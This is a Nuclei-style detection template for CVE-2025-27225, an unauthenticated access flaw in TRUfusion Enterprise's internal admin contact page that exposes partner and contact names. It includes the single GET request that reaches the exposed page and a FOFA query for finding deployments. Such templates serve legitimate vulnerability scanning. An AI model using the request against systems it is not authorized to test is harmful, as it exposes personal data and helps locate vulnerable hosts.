id: CVE-2025-27225

info:
  name: TRUfusion Enterprise <= 7.10.4.0 - Admin Contact Portal
  author: DhiyaneshDK,rcesecurity
  severity: high
  description: |
    TRUfusion Enterprise versions 7.10.4.0 and earlier contained a vulnerability that allowed unauthenticated access to the Internal Admin Contact Page, resulting in the disclosure of PII (including partner and contact names).
  impact: |
    Unauthenticated attackers can access the Internal Admin Contact Page, exposing personally identifiable information including partner and contact names without any authorization.
  remediation: |
    Upgrade TRUfusion Enterprise to a secure version by updating to one of the following releases: 7.10.3.1, 7.10.1.1, 7.10.1.0, 7.10.3.0, 7.9.6.1, 7.9.6.0, 7.9.5.0, 7.9.4.0, 7.9.3.1, 7.9.3.0, 7.9.2.1, 7.10.2.0, or 7.10.0.1.
  reference:
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27225.txt
    - https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/
    - https://docs.rocketsoftware.com/bundle/trufusion_rn_71031/page/kwg1743156415157.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-27225
    epss-score: 0.21717
    epss-percentile: 0.95845
    cwe-id: CWE-288
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="TRUfusion"
  tags: cve,cve2025,trufusion,auth-bypass,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/trufusionPortal/jsp/internal_admin_contact_login.jsp"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Partner : ", "page.logout()", "trufusionPortal")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220476b407fa169965bf263af7a379ae9888dbff637eea85533954401310153089d022100dda7af1f8ea7a09681046570ed4a81a4af027e23ae7762c0130301f646adf388:922c64590222798bb761d5b6d8e72950